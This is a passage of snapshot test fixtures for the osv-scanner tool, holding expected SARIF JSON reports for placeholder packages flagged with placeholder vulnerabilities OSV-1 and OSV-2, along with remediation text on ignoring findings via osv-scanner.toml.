false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| unknown:/path/to/my/third/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/third/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| unknown:/path/to/my/third/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/third/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2: Something less scary!", "text": "OSV-2: Something less scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/third/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@abcxzy' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/third/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine2@abc123' is vulnerable to 'OSV-2'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | abcxzy |\n| unknown:/path/to/my/third/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/third/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | abcxzy |\n| unknown:/path/to/my/third/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/third/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | abc123 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | abc123 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2: Something less scary!", "text": "OSV-2: Something less scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithMixedIssues/one_source_with_one_deprecated_package - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for 